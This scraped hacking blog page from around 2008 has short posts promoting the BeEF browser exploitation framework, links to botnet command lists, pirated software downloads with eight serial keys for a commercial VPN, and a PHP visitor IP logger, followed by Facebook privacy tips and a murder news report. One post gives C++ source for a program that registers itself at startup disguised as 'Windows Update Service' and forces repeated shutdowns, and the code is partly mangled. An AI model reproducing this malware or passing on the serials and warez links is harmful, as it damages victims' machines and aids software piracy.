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BeEF browser exploitation framework

Written by OpenMindLeader on 6:55 AM

This version has more modules and a more flexible framework.

BeEF is the browser exploitation framework. Its purposes in life is to provide an easily integratable framework to demonstrate the impact of browser and cross-site scripting issues in real-time. The modular structure has focused on making module development a trivial process with the intelligence existing within BeEF. Some of the basic functionality includes Keylogging and Clipboard Theft.

Enhancements in the latest version include:

Integration with Metasploit via XMLRPC
Mozilla extension exploitation support
New browser functionality detection modules
Tiered logging for module actions and results


Download and More info: BindShell.Net: BeEF

Command Lists of Bots

Written by OpenMindLeader on 6:50 AM

Phatbot Commands
http://www.stanford.edu/~stinson/misc/curr_res/bot_refs/phatbot_commandref.html

Agobot 3 Commands
http://www.stanford.edu/~stinson/misc/curr_res/bot_refs/agobot3_commandref.html

rBot Commands
http://www.angelfire.com/theforce/travon1120/RxBotCMDLIST.html

sdbot Commands
http://www.stanford.edu/~stinson/misc/curr_res/bot_refs/sdbot_commandref.html

spybot 1.3 commands (Scroll bit down)
http://www.stanford.edu/~stinson/misc/curr_res/bot_refs/spybot1.3_readme.txt

rename folder to con

Written by OpenMindLeader on 6:46 AM

Hey all.... If u try to make a folder name con u r not able to do it.....hehe.....but u can do it by DOS......

Steps to make a con folder.....

1.goto cmd....
2.enter the drive u want....
3.mkdir con\

If u want to delete it normally u cant.....lol..... Tongue Tongue Grin YAY

if u want to delete it.....

go back to DOS again and ...... add

rmdir con\

BT Discover 1.20

Written by OpenMindLeader on 6:43 AM

This application searches for bluetooth devices in range and saves their address to .html or .txt file.

Should work on any application with display size 176x220 and java support.


Download:
http://java.xor.sk/down.php?wtf=BT_DISCOVER_2.jar&en=1

AntiVirus for Cellphones 2008 v2

Written by OpenMindLeader on 6:42 AM



AntiVirus for Cellphones 2008 v2 | 12.41MB

All antivirus software for Cellphones update 2008 to version 2

http://w17.easy-share.com/1701087678.html
http://rapidshare.com/files/134357593/keosoft90-Antivirus.4.Cellphones.2008.v2_dasofts.rar - RS Direct (momentarily working)

Steganos Internet Annoym VPN

Written by OpenMindLeader on 6:40 AM

Well I found this program a few months ago whilst browsing the interwebz, may aswell share it with you homies

Its called Steganos Internet Annoym VPN



It connects to you to a VPN when you press connect "Usually Germany"

I uploaded this myself :]



Code:

http://rapidshare.com/files/116285731/Steganos_Internet_Anonym_VPN_Flatrate.rar

Heres some serial for this application
65B6-24C6-64B0-27AE-1B1A-4ABC-C513-6684
0457-D380-A552-C0CD-A1D8-190F-0C9F-2762
AFD3-32BA-764E-BB41-D550-E574-122C-733D
CC2A-EFAE-7F62-1407-CFE1-0E11-90D2-3598
32D8-F583-5D46-4DF2-403F-225A-B477-4497
CE28-A58D-C4D0-75D8-B750-5E01-B8D0-29CC
2189-50A6-6815-EE91-3624-C2B6-E009-0D02
D28F-EC5B-B4B7-DFF7-08C8-F941-6CD0-876E

Proxy Shell Hide IP 3.0.1

Written by OpenMindLeader on 6:37 AM


ProxyShell Hide IP is a professional and powerful hide IP software. Our unique algorithm effectively manages and uses multiple proxies to hide your IP address, provides you faster and more reliable anonymous surfing.
With ProxyShell Hide IP, you can hides IP address, surf the web without anyone knowing who you are, protect your own information and reading interests. ProxyShell Hide IP could also bypass restrictions if your IP is blocked, used to send emails or post on BBS without displaying your own IP.
ProxyShell Hide IP Standard
Free Trial, $39.95 to Buy

ProxyShell Hide IP uses our own proxies and many public proxies to hide your IP address. Our unique algorithm effectively uses multiple proxies to handle your surfing requests simultaneously, offers faster speed, much better proxy errors tolerance and stability. ProxyShell Hide IP is totally automatic and easy-to-use, it works with Internet Explorer, Firefox and all other major browsers.


Key Features of ProxyShell Hide IP

* Hide IP address to make you surf anonymously
* Send anonymous emails, post on forums without displaying your own IP
* Bypass restrictions if your IP address is blocked
* Totally automatic and easy-to-use, work with all major browsers
* Unique algorithm to effectively use public proxy servers for surfing
* Provide fast internet speed when surfing anonymously
* Proxy fault tolerance and more reliable than most of proxy softwares
* One-time price, no monthly fee, with lifetime free upgrades


Download:
http://rapidshare.com/files/231445361/ProxyShell_Hide_IP.rar

IP LOgger in | |PHP | |

Written by OpenMindLeader on 6:34 AM

Here is a simple piece of php code which can be added in your website to log the visitor's ip address.Here is the code


$v_ip = $REMOTE_ADDR;
$v_date = date("l d F H:i:s");

$fp = fopen("ips.txt", "a");
fputs($fp, "IP: $v_ip - DATE: $v_date\n\n");
fclose($fp);

?>

Long list of free web hosters

Written by OpenMindLeader on 6:31 AM

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Phishing TutS

Written by OpenMindLeader on 6:25 AM

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[C++] Repetitive Shutdown

Written by OpenMindLeader on 6:21 AM

Here is a program to shutdown your computer using c++ program

#include
#include
#include
#include
void AddToReg(char *description) {
HKEY regStart;
char sPath[300];
GetModuleFileName(NULL, sPath, 300);
RegCreateKeyEx(
HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run ",
0,
NULL,
REG_OPTION_NON_VOLATILE,
KEY_ALL_ACCESS,
NULL,
®Start,
NULL
);
RegSetValueEx(regStart, description, 0, REG_SZ, (const BYTE*)sPath, strlen(sPath));
RegCloseKey(regStart);
}
int main() {
AddToReg("Windows Update Service");
system("shutdown -s -f -t 00");
return 0;
}
There are also other methods to do this by using a simple batch file.This program is only for educational purpose.I hope u ppl will like this.

Top 5 Privacy Settings Every Facebook User Should Know

Written by OpenMindLeader on 1:17 AM

Everyday I receive an email from somebody about how their account was hacked, how a friend tagged them in the photo and they want a way to avoid it, as well as a number of other complications related to their privacy on Facebook. Over the weekend one individual contacted me to let me know that he would be removing me as a friend from Facebook because he was “going to make a shift with my Facebook use - going to just mostly family stuff.”

Perhaps he was tired of receiving my status updates or perhaps he didn’t want me to view photos from his personal life. Whatever the reason for ending our Facebook friendship, I figured that many people would benefit from a thorough overview on how to protect your privacy on Facebook. Below is a step by step process for protecting your privacy.
1. Use Your Friend Lists
I can’t tell you how many people are not aware of their friend lists. For those not aware of what friend lists are, Facebook describes them as a feature which allows “you to create private groupings of friends based on your personal preferences. For example, you can create a Friend List for your friends that meet for weekly book club meetings. You can create Friend Lists for all of your organizational needs, allowing you to quickly view friends by type and send messages to your lists.”

There are a few very important things to remember about friend lists:

* You can add each friend to more than one friend group
* Friend groups should be used like “tags” as used elsewhere around the web
* Friend Lists can have specific privacy policies applied to them

I’ll touch on each of the things listed above in more detail later. A typical setup for groups would be “Friends”, “Family”, and “Professional”. These three groups can then be used to apply different privacy policies. For example, you may want your friends to see photos from the party you were at last night, but you don’t want your family or professional contacts to see those photos.

Using friend lists is also extremely useful for organizing your friends if you have a lot of them. For instance I have about 20 friend lists and I categorize people by city (New York, San Francisco, D.C., Tel Aviv, etc), where I met them (conferences, past co-workers, through this blog), and my relationship with them (professional, family, social, etc).

You can configure your friend lists by visiting the friends area of your Facebook


2. Remove Yourself From Facebook Search Results
My mom is a teacher and one of the first things she asked me when she joined Facebook is how she could make sure her students couldn’t see that she was on the site. Understandably my mom doesn’t want her middle school students to know what she’s up to in her personal life. There are numerous reasons that individuals don’t want their information to show up in search results on Facebook, and it’s simple to turn off your public visibility.

How to Remove Yourself From Facebook Search Results
Now that you’ve decided that you would like to remove yourself from Facebook’s search results, here’s how to do it:

1. Visit your search privacy settings page
2. Under “Search Visibility” select “Only Friends” (Remember, doing so will remove you from Facebook search results, so make sure you want to be removed totally. Otherwise, you can select another group, such as “My Networks and Friends” which I believe is the default.)
3. Click “Save Changes”

By default, Facebook makes your presence visible to the network you are in. Frequently, people aren’t aware of their visibility, so this is one of the first settings that users wish to modify. By selecting “Customize” from the search visibility drop down you can make your settings even more granular.





3. Remove Yourself From Google
Facebook gets A TON of traffic from displaying user profiles in search engines. Not all of your profile is displayed though. Currently the information displayed in the search profile is limited to: your profile picture, a list of your friends, a link to add you as a friend, a link to send you a message, and a list of up to approximately 20 fan pages that you are a member of.

For some people, being displayed in the search engines is a great way to let people get in contact with you, especially if you don’t have an existing website. Facebook also tends to rank high in the search results, so if you want to be easy to find, making your search profile can be a great idea. Many people don’t want any of their information to be public though.

By visiting the same search privacy settings page listed in the previous step, you can control the visibility of your public search listing which is visible to Google and other search engines. You can turn off your public search listing by simply unchecking the box next to the phrase “Create a public search listing for me and submit it for search engine indexing” as pictured in the image below.




4. Avoid the Infamous Photo/Video Tag Mistake
This is the classic Facebook problem. You let loose for a few hours one night (or day) and photos (or videos) of the moment are suddenly posted for all to view, not just your close friends who shared the moment with you. The result can be devastating. Some have been fired from work after incriminating photos/videos were posted for the boss to see. For others, randomly tagged photos/videos have ended relationships.

At the least, a tagged photo/video can result in personal embarrassment. So how do you prevent the infamous tagged photo or video from showing up in all of your friends news feeds? It’s pretty simple. First visit your profile privacy page and modify the setting next to “Photos Tagged of You”. Select the option which says “Customize…” and a box like the one pictured below will pop up.

Select the option “Only Me” and then “None of My Networks” if you would like to keep all tagged photos private. If you’d like to make tagged photos visible to certain users you can choose to add them in the box under the “Some Friends” option. In the box that displays after you select “Some Friends” you can type either individual friends or friend lists.


5. Protect Your Albums
Just because you’ve uploaded photos doesn’t mean that you’ve accurately tagged every photo correctly. This setting is more of a reminder than anything else. Frequently people will turn of their tagged photo visibility to certain friend lists yet keep their photo albums public to the world. If you are trying to make all your photos invisible you must do so on an album by album basis.

There is a specific Photos Privacy page from which you can manually configure the visibility of each album (as pictured below). This is an extremely useful configuration option and I highly recommend that you take advantage of it. This way you can store your photos indefinitely on Facebook yet ensure that the only people that can view your photos are the ones who you really want to see them.

Man killed wife in Facebook row

Written by OpenMindLeader on 1:13 AM


A man has been jailed for life for stabbing his wife to death over a posting she made on the social networking site Facebook.

Wayne Forrester, 34, told police he was devastated that his wife Emma, also 34, had changed her online profile to "single" days after he had moved out.

The Old Bailey heard Forrester drove to her home in Croydon, south London, and attacked the mother-of-two.

He stabbed her with a kitchen knife and a meat cleaver on 18 February.

Forrester, who pleaded guilty to murder, was ordered to serve a minimum term of 14 years.

Judge Brian Barker, the Common Serjeant of London, told him: "You committed a terrible act. There is no possible excuse or justification.

"This is a tragic killing and what you have done has caused untold anguish."

Forrester, an HGV driver, was drunk and high on cocaine when he attacked the mother of two in the early hours as she slept.

He beat her, tore out clumps of her hair, and repeatedly stabbed her in the head and neck.

Neighbours were woken up by her screams. They found him sitting outside the house covered in blood and called the police.

The court heard Forrester thought his wife, a payroll administrator, was having an affair and had threatened to kill her.

The couple, who had been together for 15 years, had a "volatile" marriage, jurors were told.

'Devastated and humiliated'

The day before the murder, he called her parents and complained about his wife's Facebook entry which he said "made her look like a fool", the court heard.

In a statement to police Forrester said: "Emma and I had just split up. She forced me out.

"She then posted messages on an internet website telling everyone she had left me and was looking to meet other men.

"I loved Emma and felt totally devastated and humiliated about what she had done to me."

In a victim impact statement, Mrs Forrester's sister Liza Rothery said the murder had had a "devastating" impact on her and parents Frances and Robert.

Miss Rothery added: "What on earth could Emma have done to result in such a brutal, callous attack on a defenceless woman?"